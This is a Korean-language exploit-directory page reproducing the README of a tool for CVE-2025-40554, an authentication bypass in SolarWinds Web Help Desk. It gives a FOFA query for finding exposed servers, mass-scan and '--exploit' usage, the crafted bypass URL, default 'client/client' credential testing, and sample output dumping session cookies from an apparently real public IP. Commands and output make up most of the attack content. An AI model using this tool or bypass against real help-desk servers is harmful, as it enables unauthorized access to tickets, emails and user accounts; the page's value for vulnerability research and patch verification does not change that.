Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-40554 — CVE-2025-40554 익스플로잇 | Kitploit
도구/GitHubGitHub/skynoxk/cve-2025-40554
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 익스플로잇

저장소 보기
27개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-40554 익스플로잇 스위트

SolarWinds Web Help Desk의 인증 우회 취약점(CVE-2025-40554 / CVE-2025-40536)을 탐지하고 익스플로잇하기 위한 종합적인 보안 테스트 도구입니다.

⚠️ 면책 조항

교육 및 공인된 보안 테스트 목적으로만 사용

이 도구는 사용자가 소유하거나 명시적인 서면 허가를 받은 시스템에 대한 보안 연구, 침투 테스트, 취약점 평가를 위해 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 작성자는 이 도구의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.

🔍 취약점 개요

CVE-2025-40554는 SolarWinds Web Help Desk의 인증 우회 취약점으로, 인증되지 않은 공격자가 다음을 수행할 수 있습니다:

  • 인증 메커니즘 우회
  • 권한 있는 관리 기능에 접근(인증)
  • 시스템 구성 열거

영향을 받는 버전

  • SolarWinds Web Help Desk (구체적인 버전 정보는 확인 필요)
  • 패치된 버전은 SolarWinds 보안 권고 참조

🚀 기능

직접 확인해보세요 :))

종속성:

  • Python 3.6+
  • requests 라이브러리
  • urllib3 라이브러리

🛠️ 설치

root@kitploit:~
# 스크립트 다운로드 또는 복제
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# 실행 권한 부여
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 사용법

기본 스캔 (단일 대상)

root@kitploit:~
# 간단한 취약점 확인
python3 CVE-2025-40554.py -t https://target:8443

# 프로토콜 명시
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

전체 익스플로잇 모드

root@kitploit:~
# 세션 열거를 포함한 완전한 익스플로잇
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# 기본 자격 증명 테스트 건너뛰기
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

대량 스캔

root@kitploit:~
# 파일에서 여러 대상 스캔
python3 CVE-2025-40554.py -l targets.txt

# 익스플로잇과 함께 대량 스캔
python3 CVE-2025-40554.py -l targets.txt --exploit

# 조용한 모드 (최소 출력)
python3 CVE-2025-40554.py -l targets.txt -q

# 사용자 정의 출력 파일
python3 CVE-2025-40554.py -l targets.txt -o results.txt

대상 파일 형식

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# 주석 지원

🎯 명령줄 옵션

📊 출력 예제

성공적인 익스플로잇

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     인증 우회 익스플로잇 도구                                     ║
║     연구 및 교육 목적으로만 사용                                   ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: 세션 설정...
[+] WOSID 추출됨: AbCdEfGhIjKlMnOpQrStU
[+] XSRF 토큰: abc123-def456-ghi789

[*] Step 2: 인증 우회 테스트...
[+] 우회 지표 발견: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] 취약함 - 인증 우회 확인됨!

[*] Step 3: 기본 자격 증명 테스트 (client/client)...
[+] 성공 - 기본 자격 증명 작동!

======================================================================
익스플로잇 모드 - CVE-2025-40554 인증 우회
======================================================================

[*] 우회 URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] 인증 우회 트리거...
[+] 인증 우회 성공!

[*] 세션 쿠키:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
요약
======================================================================
[+] 대상이 CVE-2025-40554에 취약함
[+] 기본 자격 증명: 작동
======================================================================

대량 스캔 결과

root@kitploit:~
[*] targets.txt에서 5개의 고유 대상 로드됨
[*] 모드: 우회 + 기본 자격 증명 테스트
[*] 전체 익스플로잇 활성화됨

[1/5] https://target1:8443 테스트 중
[+] 취약함 - 인증 우회 확인됨!
[+] 성공 - 기본 자격 증명 작동!

[2/5] https://target2:8443 테스트 중
[!] 취약하지 않음 - 인증 우회 실패

...

======================================================================
스캔 요약
======================================================================
총 스캔:     5/5
취약함:        2
기본 자격 증명 작동:   1
======================================================================

[+] 결과가 vulnerable_targets.txt에 저장됨

🔧 기술 세부 사항

익스플로잇 흐름

  1. 세션 설정

    • WHD 인스턴스에 연결
    • 여러 소스에서 WOSID(WebObjects 세션 ID) 추출
    • XSRF 토큰이 있으면 캡처
  2. 인증 우회

    • WOSID 주입을 통한 악의적인 URL 제작
    • WebObjects 라우팅의 경로 탐색 익스플로잇
    • 인증 검사 우회
  3. 자격 증명 테스트 (선택 사항)

    • CSRF 보호가 적용된 로그인 폼 파싱
    • 기본 자격 증명(client/client) 테스트
    • 성공적인 인증 검증
  4. 전체 익스플로잇 (--exploit 모드)

    • 세션 쿠키 내보내기
    • 이메일, 티켓, 데이터베이스, 사용자 접근 (제거됨)

취약점 지표

도구는 다음을 확인하여 성공적인 우회를 탐지합니다:

  • externalAuthContainer - 외부 인증 구성
  • JSONRpcClient - API 클라이언트 노출
  • SAML 2.0 - SSO 구성
  • LoginPref - 로그인 기본 설정
  • authMode - 인증 모드 설정

🤝 기여

기여는 환영합니다.....

📚 참고 자료

  • CVE-2025-40554 세부 정보
  • CVE-2025-40536 세부 정보
  • SolarWinds 보안 권고
  • WebObjects 프레임워크 문서

📄 라이선스

이 도구는 어떠한 종류의 보증 없이 "있는 그대로" 제공됩니다. 사용에 따른 책임은 사용자 본인에게 있습니다.

👤 작성자

Skynoxk


항상 윤리적이고 합법적으로 해킹하세요. 무단 접근은 범죄입니다.

도구 다운로드
옵션설명
-t, --target URL테스트할 단일 대상 URL
-l, --list FILE대상 목록을 포함한 파일 (한 줄에 하나씩)
--exploit열거를 포함한 전체 익스플로잇 모드 활성화
--no-login기본 자격 증명 테스트 건너뛰기
-o, --output FILE취약한 대상에 대한 출력 파일 (기본값: vulnerable_targets.txt)
-q, --quiet최소 출력 모드 (대량 스캔에 유용)